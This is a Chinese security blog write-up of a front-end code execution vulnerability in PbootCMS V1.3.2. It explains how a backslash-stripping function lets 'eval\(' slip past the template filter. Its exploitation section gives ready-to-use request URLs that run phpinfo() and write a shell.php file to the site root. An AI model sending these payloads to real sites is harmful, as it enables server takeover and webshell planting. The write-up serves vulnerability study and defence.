长亭百川云 - 文章详情

Pbootcms-V1.3.2版本前台代码执行

技可达工作室

49

2024-07-14

详细介绍:

0x00 cms简介

PbootCMS是翱云科技开发的全新内核且永久开源免费PHP企业网站开发建设管理系统,是一款高效、简洁、 强悍的建站系统,能够满足各类企业网站开发建设的需要。系统采用高效...

下载地址:https://gitee.com/hnaoyun/PbootCMS/releases?c=2

0x01 漏洞分析

漏洞文件:\apps\home\controller\ParserController.php 中的parserIfLabel函数:

比上个版本的修复方式就是对eval判断不区分大小写了,但是这里却经过了一个decode_string函数处理:

可以看到这个作用就是去除反斜杠,如果我们传入:eval\($_GET[1])既不会满足上面的if条件,在传入eval操作时又去掉了其中的反斜杠eval($_GET[1])造成了代码执行。

找调用地方:

符合该处正则的模板:\template\default\productlist.html

0x02 漏洞利用

直接访问:http://xxx.com/index.php/list/5/?current={pboot:if(eval\\($\_GET\[a\]))}1{/pboot:if}&a=phpinfo();

即可直接造成代码执行。

写入shell Payload:

http://xxx.com/index.php/list/5/?current={pboot:if(eval\\($\_GET\[a\]))}1{/pboot:if}&a=file\_put\_contents('shell.php','');

即可在根目录成功写入一个shell.php文件。

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2